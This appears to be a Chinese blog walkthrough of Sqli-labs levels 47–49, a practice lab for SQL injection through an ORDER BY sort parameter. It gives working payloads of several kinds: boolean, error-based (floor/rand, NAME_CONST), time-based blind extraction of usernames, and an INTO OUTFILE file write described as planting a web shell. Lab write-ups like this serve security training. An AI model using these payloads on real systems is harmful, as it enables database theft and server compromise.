zoukankan      html  css  js  c++  java
  • SQL注入之Sqli-labs系列第四十七关,第四十八关,第四十九关(ORDER BY注入)

    0x1 源码区别点

    将id变为字符型:
    $sql = "SELECT * FROM users ORDER BY '$id'";

    0x2实例测试

    (1)and rand相结合的方式

    payload:
    http://localhost/sqli-labs-master/Less-47/?sort=1' and rand(ascii(left(database(),1))=116)--+ 

    (2)利用报错的方式进行

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select 1 from(select count(*),concat(0x5c,database(),0x5c,floor(rand(0)*2))x from information_schema.tables group by x)a)--+

    网上摘录语句:
    http://localhost/sqli-labs-master/Less-47/?sort=1' and (select count(*) from information_schema.columns group by concat(0x3e,0x3e,(select database()),0x3e,0x3e,floor(rand()*2)) limit 0,1)--+

     

    (3)另类报错语句

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (select * from (select NAME_CONST(version(),1),NAME_CONST(version(),1))x)--+  

    (4)延迟注入 

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr(database(),1,1))=116,0,sleep(5)))--+  

    (5)使用into outfile导出文件

    http://localhost:81/sqli-labs-master/Less-47/index.php?sort=1' into outfile "C:/testphp/Apache24/htdocs/sqli-labs-master/Less-47/test.txt" 

    进行网马写入

    后面的十六进制是<? php phpinfo();?>

    0x3第四十八关

    这关和第四十七关的区别在于没有报错信息,也可以采用into outfile

    http://192.168.232.135/sqli-labs/Less-47/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+  

    0x4第四十九关

    这关和第四十七关的区别在于没有报错信息 

    http://192.168.232.135/sqli-labs-master/Less-49/?sort=1' and (if(ascii(substr((select username from users limit 0,1),1,1))=69,0,sleep(1)))--+  
  • 相关阅读:
    跳出iframe
    leetcode 225. Implement Stack using Queues
    leetcode 206. Reverse Linked List
    leetcode 205. Isomorphic Strings
    leetcode 203. Remove Linked List Elements
    leetcode 198. House Robber
    leetcode 190. Reverse Bits
    leetcode leetcode 783. Minimum Distance Between BST Nodes
    leetcode 202. Happy Number
    leetcode 389. Find the Difference
  • 原文地址:https://www.cnblogs.com/AmoBlogs/p/8725793.html
Copyright © 2011-2022 走看看